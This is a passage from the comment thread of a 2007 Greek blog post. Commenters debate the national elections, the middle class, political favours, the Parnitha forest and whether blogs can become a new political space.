    τα μπλογκς έχουν μια ανίκητη ικανότητα: Γνωρίζεις τους ανθρώπους προσωπικά. Αν λοιπόν ήταν μπλογκερς κάποιοι από τους υποψήφιους θα βλέπαμε καθαρά τη δίψα τους για εξουσία και χρήμα. και τότε η απόφαση : τι θαψηφίσουμε ; θα ήταν ακόμα πιο δύσκολη. γιατί η απομυθοποίηση σε κάνει να απορρίπτεις , και ίσως κάποια στιγμή να φθασεις να ψηφίζεις με ένα αίσθημα ελεημοσύνης , απαξίωσης, για τους ανθρώπους που αν δεν εχουν εξουσία είναι ανύπαρκτοι. και για να δούμε καλύτερα την έννοια «ανύπαρκτοι» , σκεφτείτε ατομα που απορρίφηκαν απο υποψηφιότητες και πρέπει να ξαναγυρίσουν στη δουλειά τους (ξέρετε ποιούς εννοώ).
    και ίσως αυτό το τελευταίο παράδειγμα είναι καλό για να γνωρίζετε πως «μας βλεπουν» οι πολιτικοί εμάς τους «ψηφοφόρους» .
    🙂

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 9, 2007 @ 11 :48 πμ | Απάντηση

  18. μπλου
    δηλαδή εννοείς να ξεκινήσουμε από το ποιον «δεν» θα ψηφίσουμε ;
    ας υποθέσουμε ότι ψηφίζουμε τον «μονόφθαλομο» όπως είπα παραπάνω . Τον κάπως καλύτερο από το σωρό των αχρηστων. Τότε το πολιτικό ερώτημα είναι : αν είχες καποιον γνωστό σου πολιτικό , αρκετά γνωστό , σχεδόν φίλο , θα του ζητούσες ένα διορισμό ή θα προτιμούσες να τον επηρεασεις για καποιο σημαντικό θέμα , την Πάρνηθα ας πούμε ώστε μέσω αυτού να κάνεις και εσύ «πολιτική»;
    λοιπόν ; ακούω : διορισμό ή πραγματική πολιτική ;
    🙂

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 9, 2007 @ 11 :57 πμ | Απάντηση

  19. Θέλω να είμαι άντρας με Α κεφαλαίο (οχι Αλαβάνος), αλλά δε θέλω να είμαι μεσαίος. Υπάρχει κάποιος τρόπος;;

    Σχόλιο από bar-ufo-s — Σεπτεμβρίου 9, 2007 @ 7 :55 μμ | Απάντηση

  20. Τα blogs είναι υπόθεση μεγαλύτερων ηλικιών. Τα σημερινά 18χρονα βαριούνται και πολύ καλά κάνουν να ασχολούνται με το blogging.
    Το παάδειγμα που ανέφερα με τη διαμορφωμένη πολιτική άποψη τότε σημαίνει ότι σήμερα ο μέσος 18άρης πείθεται από κάποιον που είναι κοντά στα καθημερινά του προβλήματα και φυσικά αυτός δεν μπορεί να είναι άυλος blogger.
    Επιπλέον η μπλογκόσφαιρα έχει από τη φύση της πολλές διαμάχες επικράτησης φαντάσου να πάρει επάνω της και την πολιτική διαμόρφωση του ελληνικού λαού.. ποιος μας μαζεύει όλους μαζί..
    Η φράση που θα ήθελες να γράψεις ίσως να ήταν «πλίνθοι κέραμοι ατάκτως εριμμένοι» όπως ακριβώς είναι και τα πολιτικά μας πράγματα..
    Τώρα όσον αφορά τους άνεργους πολιτικούς, ας πρόσεχαν. Δεν είναι 16χρονα και θα πρέπει να ήξεραν και τις «στραβές» ειδικά σε επίπεδα εξουσίας. Για τη Γεννηματά τί να πω και τί να γράψω.. η μετριότητα που φέρει ένα αξιοπρεπές επίθετο. Δεν είναι και η πρώτη.
    Στον λαϊκό τσαμπουκά της Πατουλίδου θα σταθώ: όταν σε πείθουν να κατέβεις υποψήφια για τη νομαρχία Θεσσαλονίκης με αντίπαλο τον Πανίκα, έχουν και κάτι άλλο στο πίσω μέρος του μυαλού τους για σένα, σαν αξιολόγηση, σαν τοποθέτηση.
    Εάν εσύ πιστέψεις όσα σου πουν και σου τάξουν ε, κάπου το έχεις χάσει !
    Η πολιτική είναι μια πολύ δύσκολη υπόθεση, δεν χρειάζεται μόνο glam, golden Olympic medals και τσαμπουκά, θέλει και υπόβαθρο.. πικρή ελιτίστικη αλήθεια αλλά αλήθεια !

    Σχόλιο από So_Far — Σεπτεμβρίου 9, 2007 @ 9 :08 μμ | Απάντηση

  21. barufos
    με ρωτάς τι προτείνω ;
    Η απαντηση είναι ασχολήσου ενεργά.
    εσύ δεν χρειαζεσαι κάποιο προσωπικό ρουσφέτι.
    οπότε η άποψη είναι: ζητάω ρουσφέτι για την Πάρνηθα, θέλω να μη χτιστεί η Παρνηθα.
    και δεν το λεω σε σένα φιλε τάκη θα ήθελα πολύ εγώ να ζητήσω ένα τέτοιο ρουσφέτι . Δεν θέλω να χτιστεί η Πάρνηθα. Το καζίνο να παραμείνει εκεί που ήταν πάντα. τα σύνορα του δάσους είναι αδιαπραγματευτα.
    🙂

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 10, 2007 @ 10 :34 πμ | Απάντηση

  22. σο φαρ
    αφού το άνοιξες το θέμα πες μας τα προσόντα ενός πολιτικου.
    ενος σύγχρονου πολιτικού
    🙂

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 10, 2007 @ 10 :37 πμ | Απάντηση

  23. Λοιπόν, να που το σεξ μας ξαναπροέκυψε στις εκλογές μετά το ποστ της So_far. Για να μιλήσω συμβολικά και μετωνυμικά (δυστυχώς μόνο αυτή την ευφυία διαθέτει το κατάστημα) το ποστ σου θα μπορούσε να έχει τον τίτλο: Η νεκραναστημένη αυτοκρατορία της μεσαίας τάξης αντεπιτίθεται».
    Άρα οι λίγοι και ισχυροί προσπαθώντας να αποφασίσουν που θα φυτέψουν τα αμμόλογά τους, πώς θα κατασκευάσουν την εικόνα τους οι επικοινωνιολόγοι, πώς θα δείξουν λίγη αλαβανική τσαχπινιά με τσιπρικό ποντίκι χάνουν τη βασική και ζωτική χαρά της ζωής, το ξέγνοιαστο σεξ και για να τεκτονοποιήσουν χρειάζονται μετά εξωσωματικές μς τα γνωστά δίδυμα αποτελέσματα.
    Θα συμφωνήσω με την So_far για την αμφίβολη ύπαρξη ενός ομοιογενούς μεσαίου χώρου. Η δική μου αίσθηση, μολονότι έχω μερικά χρονάκια που εγκατέλειψα τα χρηματοοικονομικά, είναι ότι η μεσαία τάξη υπήρξε μια κατασκευή που βάσισε τα πήλινα ποδαράκια της σε χίλια μύρια δάνεια και ευκολίες πληρωμής με δόσεις. Δόθηκε η σφαλερή εντύπωση ότι όλοι το ίδιο είμαστε σε τούτο τον κοσμάκη με ένα ακόμη διακοποδάνειο. Πιστεύω ότι η φούσκα της μεσαίας τάξης δεν έσκασε ακόμη μαζί με μερικές ακόμη, αλλά μετρημένες είναι οι ώρες της. Στο τέλος θα καταλήξουμε εκεί στον πάτο των μικρών να γνέφουμε τους μεγάλους από το υπερπέραν, αυτών των μεγάλων που όταν δεν έχουν χρόνο για σεξ απλώς τον αγοράζουν.

    Υγ. Σχετικά με την τελευταία πρόκληση του ανώνυμου, σο φαρ, πες για όλα τα προσόντα, αν με πιάνεις….

    Σχόλιο από doratsirka — Σεπτεμβρίου 10, 2007 @ 11 :48 πμ | Απάντηση

  24. Δυστυχώς η πολιτική είναι ρεαλισμός.
    Αυτό δεν το έχουν καταλάβει όλοι.
    Το κακό είναι οτι μας αφορά όλους.
    Μα , όλους !
    είτε το αρνούμαστε είτε οχι…
    είτε γελάμε (με τα ποστ της So Far πχ.) είτε οχι..

    Αρα πρέπει να ψηφίσουμε.
    ΤΙ και ποιούς όμως.

    Επειδή εγώ ακόμα δεν θέλω να πιστεύω στην ισοπεδοποίηση προσθέτω οτι πρέπει να ψάξουμε σε όλους τους πολιτικούς σχηματισμούς μήπως βρούμε αυτούς που ξεχωρίζουν.

    Τόσο απλά ..αλλα και δύσκολα ταυτόχρονα !

    Αυτή είναι η «αισιόδοξη» πλευρά

    Η «απαισιόδοξη» (πολύ σεβαστή και αυτή)διακρίνεται μέσα στις γραμμές των παραπάνω σχολίων (και οχι μόνο εδώ) και που τελικά καταλήγει σε μία μορφή άρνησης ψήφου, κατανοητή η θέση και σεβαστή αλλά δυστυχώς αδιέξοδη.

    πχ. το «ρουσφέτι» για τη Πάρνηθα είναι βαθιά πολιτικό και δεν αρκεί (όπως φάνηκε) η ατομική αντίδραση και δράση…

    ΥΓ Μη νομίζεις οτι εχω εφησυχάσει με αυτά που λέω!..κάθε άλλο!

    Σχόλιο από Takis — Σεπτεμβρίου 10, 2007 @ 12 :07 μμ | Απάντηση

  25. doratsirka
    η μεσαία τάξη αποτελεί μια εγγύηση και μια προσγειωμένη αντίληψη για μοντέλο δημοκρατίας, από τη στιγμή που «λειτουργησε» στη δυτική ευρώπη την εποχή του ψυχρού πολέμου και «μοίρασε» αναπτυξη και ευημερία και χρήμα όχι μόνο στους «ευρωπαίους μεσαίους» αλλά και στους μετανάστες του νότου (και σε μας).
    Τώρα για την πλασματική εικόνα που μιλάς έχεις μάλλον δίκιο , αλλά μη ξεχνάς και την καταστροφή του 99 όπου «θυσιαστηκαν» ελληνικά χαρτοφυλάκια για να κερδηθούν οι εκλογές του μαρτίου από τη σημερινή αντιπολίτευση. Τότε υπήρχε η αντίληψη ότι δεν μπορούν να παν σε εκλογές με το χρηματιστήριο να υπερθερμαίνεται. Υπήρχε η αντίληψη ότι το πολύ χρήμα κάνει κακό στους μικρομεσαίους έλληνες και …έπειτα ηρθαν τα δάνεια .
    🙂

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 11, 2007 @ 11 :35 πμ | Απάντηση

  26. τακη
    «μη νομίζεις ότι εχω εφησυχάσει …»
    αυτή είναι η φλόγα για να διατηρείς το μπλογκ σου.
    Αν με ρωτούσαν γιατί μπλογκάρω θα έλεγα αυτό «δεν έχω εφησυχάσει».
    Προσωπικά, όπως εχω διατυπώσει και σε άλλες φάσεις προβλέψεις για την πολιτική «στασιμότητα» , δεν βλέπω να προκύπτει νέα πολιτική κίνηση κάπου αλλού εκτός από το ίντερνετ.
    🙂

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 11, 2007 @ 11 :40 πμ | Απάντηση

  27. Λίγο υπερβολικό,
    το οτι δηλ. δεν προκύπτει νέα πολιτική κίνηση αλλού εκτός ιντερνέτ..

    Σίγουρα πιστεύω οτι το ιντερνετ είναι μεγάλο μέσο (που ακόμα είναι στην αρχή) αλλά γιατί να είναι και το μοναδικό?
    Πολιτικές κινήσεις μπορεί να εμφανιστούν παντού (και στο ιντερνετ)…εξαρτάται το πως μεταφράζονται οι ανάγκες των ανθρώπων.

    Σχόλιο από Takis — Σεπτεμβρίου 11, 2007 @ 12 :27 μμ | Απάντηση

  28. Είμαι πολύ λίγη για να σου πω τα προσόντα ενός σύγχρονου πολιτικού. Βρίσκομαι βλέπεις στο ακροατήριο των όποιων πολιτικών διεργασιών.
    Σημάδι της αμηχανίας μου είναι και το γεγονός ότι στο blog μου το έχω ρίξει στην παλαβή προσπαθώντας απλά να περιγράψω την κατάσταση ή αν θέλεις να ξεφορτώσω όσα έχω και κουβαλάω χρόνια τώρα.
    Και πάλι επειδή μάλλον είμαι κομπλεξικό άτομο την αριστερά δεν την έχω πειράξει, αν και θα έπρεπε. Μάλλον θα το κάνω συνολικά αν προλάβω.
    Για τη μεσαία τάξη τα έχω πει. Πάνω και κάτω όρια, μέσος όρος. Πολύ σωστά είπε και η doratsirka για την ψευδαίσθηση ότι είμαστε όλοι ίσοι με κάρτες, δάνεια και υπερχρεώσεις.
    Εσκεμμένο το κόλπο, σκοπός ήταν να βρεθεί ένα αντίπαλο λειτουργικό δέος μπροστά στην περίφημη πάλη των τάξεων.
    Και βρέθηκε και λειτούργησε.
    Αλλά όλα αυτά δεν κρατούν για πολύ. Κάτι που δεν συνειδητοποιήσαμε ποιοτικά και μείναμε μόνο στην ετικέτα.
    Για παράδειγμα μπορεί να μιλήσει κάποιος για αγροτική παραγωγική μεσαία τάξη στην Ηλεία; την εύφορη Ηλεία; Τί να πάει να τους πει; Σας εξαφανίσαμε;
    Συνεπώς οι συνθήκες μεταβάλλονται ραγδαία και πολύ φοβάμαι ότι ΠΑΣΟΚ & ΝΔ που μάχονται για ένας είδος φιλελευθερης σοσιαλδημοκρατίας ελληνικού τύπου θα πρέπει να κάνουν ειδικές επεξεργασίες πάνω στις συνθήκες που διαμορφώνονται σήμερα. Που δεν θα κάνουν σύντομα τουλάχιστον.

    Ανέφερες την πολιτική κίνηση στο διαδίκτυο και προφανώς αναφέρεσαι στην Φιλελεύθερη Συμμαχία. Σε κάποιες θέσεις της ( όπως η αποποινικοποίηση των ναρκωτικών, η ανεξιθρησκεία, η μη υποχρεωτική στράτευση – αυτά θυμάμαι προς το παρόν – ) συμφωνώ απόλυτα. Είναι τολμηρές τομές. Δεν έχω διαβάσει κάτι όμως ( ίσως και παράλειψή μου ) για τα μέσα παραγωγής και την οικονομία. Αν δεν υπάρχουν σοβαρές και σύγχρονες επεξεργασίες εκεί τότε γιατί να μην συνασπιστεί με κάποιο ήδη υπάρχον κόμμα λειτουργώντας συμπληρωματικά;
    Αλλά και πάλι είναι πολύ φρέσκο δημιούργημα , οι πολιτικές επεξεργασίες θέλουν χρόνο και πείρα οπότε τί συζητάμε; Εδώ ολόκληρο Πασόκ και μας έστειλε αδιάβαστους με εκείνο το «χρήματα υπάρχουν ή θα βρεθούν χρήματα» χωρίς να λέει το πώς και από ποια μέσα παραγωγής ή και δανεισμού..
    Υποτίθεται ότι είναι κόμμα εξουσίας …

    ΥΓ Ξέρει κανείς αν εκτός απο Μακεδονικό έχουμε και Θρακικό ζήτημα; Γιατί ο Καρατζαφέρης προσπαθεί να βγάλει υπό αμφισβήτηση τα σύνορά μας..

    Σχόλιο από So_Far — Σεπτεμβρίου 12, 2007 @ 7 :31 πμ | Απάντηση

  29. Το lifestyle του ψηφοφόρου;
    Έχασα πολλά επεισόδια και έμεινα στη φράση των σχολίων..»υπάρχουν άντρες;»
    ..και το άλλο..υπάρχουν σύνορα ακόμα;
    Γιατί εγώ ανώνυμε, μάλλον κάτι σε «μπάτε σκύλοι αλέστε» βλέπω..

    Σχόλιο από diVa — Σεπτεμβρίου 12, 2007 @ 1 :21 μμ | Απάντηση

  30. diva
    δεν υπαρχει κρατος που να μη είναι μπατε σκύλοι. Απλά αυτό αποδεικνύεται όταν συμβεί η «ανάλογη καταστροφή».
    «οι αντρες» θα σώσουν και πάλι τη χώρα. Γιατί άντρες δεν ειναι όσοι εχουν τα ανατομικά κριτιρια , αλλά όσοι χρησιμοποιούν τις ικανότητες τους για αν δώσουν λύση στα μικρότερα ή μεγαλύτερα προβλήματα που προκύπτουν … από το να κάνουν δεξιά και να καβαλήσουν πεζοδρόμιο όταν ακούσουν ασθενοφόρο πίσω τους , μέχρι να το «ψάξουν» όταν ένα καινούριο εγγραφο στο γραφείο δεν ξεκαθαρίζει τι ακριβώς πρέπει να γίνει.
    επίσης οι άντρες πρέπει , τώρα πια που όλα είναι τόοοοσο ευκολα να έχουν ένα μπλογκ και να δημοσιοποιούν αυτά που πρέπει να ξερουμε πριν προλάβουν να τα «φιλτράρουν» οι δημοσιογράφοι.
    🙂
    που ψηφίζεις ετεροδημότη , εδώ ή θσλνκη ?

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 13, 2007 @ 11 :24 πμ | Απάντηση

  31. σο φαρ
    εμένα μου αρέσει ο τρόπος που κανεις χιούμορ στο μπλογκ σου και επιπλέον ξεκαθαρίζω τις ομίχλες μου για πράγματα που δεν γνώριζα και τόσο καλά.
    Όταν μιλάω για ιντερνετικό κόμμα (δεν γνώριζα την φιφλελευθερη συμμαχία) εννοώ διαφορα αρθράκια που εχω γραψει κατα καιρούς σε σάιτ γιατί δεν υπήρχαν τα μπλογκ και μιλάνε για τη σύγχρονη νοοτροπία :να απαιτώ μια πολύ γρήγορη και φθηνη ει ντι εσ ελ , να έχω το αγχος να ανοίξω καθημερινά τα μειλ μου , να είμαι συνεπής με τους ανθρώπους που γνωρίζω εδώ μέσα, και να μη χρησιμοποιώ τό ίντερνετ μόνο σαν μεσο για να διαδώσω τις ιδέες μου στις εκλογές , αλλά να στηρίζω αυτό που συμβαίνει εδώ μέσα , γιατί το θεωρώ καινούριο δικό μου χώρο και ξερω ποιοί ενδιαφέρονται για μία πολιτική κίνηση που ξεκινάει από εδώ και ποιοί απλά το χρησιμοποούν σαν εναλλακτικό διαφημιστικό πεδίο.

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 13, 2007 @ 11 :33 πμ | Απάντηση

  32. τακη
    δεν ξερω αν απάντησα … αλλά νομίζω πως μόνο εδώ υπαρχει χώρος για ελεύθερη και δημοκρατική διακίνηση ιδεών , υπαρχουν πρόσωπα που καταννοούν τον κόσμο που αλλάζει και έχουν κατι καινούριο να πούν .
    δεν ξερω αν όσοι λειτουργούν «εκτός τειχών» (εκτός διαδικτύου) μπορούν να συλλαβουν αυτή την κατασταση : να μιλάμε τόσο καιρό για τους προβληματισμούς μας χωρίς καν να γνωριζόμαστε . και … ακόμη περισσότερο να νιώθουμε την ανάγκη να ενημερώνουμε το μπλογκ μας , να απαντάμε στα σχόλια , να βοηθάμε κάποιον που ζητάει βοήθεια, …..
    αυτά 🙂

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 13, 2007 @ 11 :39 πμ | Απάντηση

  33. 🙂
    Μυστικό
    [πάντως ούτε εδώ ούτε εκεί:-]

    Σχόλιο από diVa — Σεπτεμβρίου 13, 2007 @ 2 :56 μμ | Απάντηση

  34. εγώ click-@ ως σκίουρος ψηφίζω τα δέντρα τα αψηλά
    και τα Τοπία τα ξαπλωτά
    και ρίχνως όσες ..»ψήφοι» θέλω
    νταξ;

    Σχόλιο από diVa — Σεπτεμβρίου 14, 2007 @ 8 :22 μμ | Απάντηση

  35. ε νταξ
    εγω ημανε και οχι η ντιβα πριν
    λιγη υπομονη ντουτς
    αλλαζει σπιτι αλλαζω πι σι
    θα ερθω στα ισα μου

    προς το παρον σφυριζω αδιαφορα
    οχι οχι κοκονα μου δεν πειραξα τιπτα
    :-ρ

    Σχόλιο από Sardonian — Σεπτεμβρίου 14, 2007 @ 8 :23 μμ | Απάντηση

  36. sardo
    χαιρετώ την επαναφορά του προέδρου
    🙂 🙂

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 15, 2007 @ 12 :16 μμ | Απάντηση

  37. kalhmera anwnume..upothetw pws auto einai to teleutaio sxolio gia tis ekloges..mias kai perasan!!lol..kai mporw na apnthsw xwris piesh..xexe..
    loipon..me rwthses an tha dialega metaksu diorismou h pragmatikhs politikhs..loipon mexri twra sth mikrh zwh mou den exei tuxei na xreiastw pote th voitheia oute thn epidiwksa gia na taktopoihsthw..vevaia pote den kserw ti tah ginei sto mellon kai gia na eimai eilikrhnhs pote den lew pote, an kai me ahdiazoun afantasta ta glupsimata (tah to analusw se post auto–mh parekshgeiste osoi exete vusmata.den ennow esas,den einai kako na exeis vusma ..eksartatai pws to xrhsimopoieis)
    parolauata se auth th fash san blue! kai bebaia tha dialega na boithisw ,na mesolavhsw h oti allo mporw na kanw prokeimenou na dromologhthei ena megalo ergo pou tha einai pros ofelos ths polhs mou h genika ths xwras..(megala logia i know)
    para na voleutw egw kai na voithisw etsi ena atomo mono(emena)an ennoeis auto pragmatikh politikh …e ok..eimai enoxh..twra an aurio poulaw koulourakia sthn egnatia einai allo thema…filia polla
    p.s. ….akoma perimenw….

    Σχόλιο από blue — Σεπτεμβρίου 17, 2007 @ 2 :08 μμ | Απάντηση

  38. hello blue
    goustaro aneksartisia …
    mou aresoun ta «viastika» greeklish sou ,
    exo adynamia sta koulouria me sousami …
    tha sou agorazo olo to kalathi me ti mia kai tha sxolas amesos
    🙂

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 18, 2007 @ 10 :39 πμ | Απάντηση


RSS feed for comments on this post. TrackBack URI

Σχολιάστε

Εισάγετε τα παρακάτω στοιχεία ή επιλέξτε ένα εικονίδιο για να συνδεθείτε:

Λογότυπο WordPress.com

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό WordPress.com. Αποσύνδεση / Αλλαγή )

Φωτογραφία Twitter

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Twitter. Αποσύνδεση / Αλλαγή )

Φωτογραφία Facebook

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Facebook. Αποσύνδεση / Αλλαγή )

Φωτογραφία Google+

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Google+. Αποσύνδεση / Αλλαγή )

Σύνδεση με %s

Blog στο WordPress.com.

Αρέσει σε %d bloggers: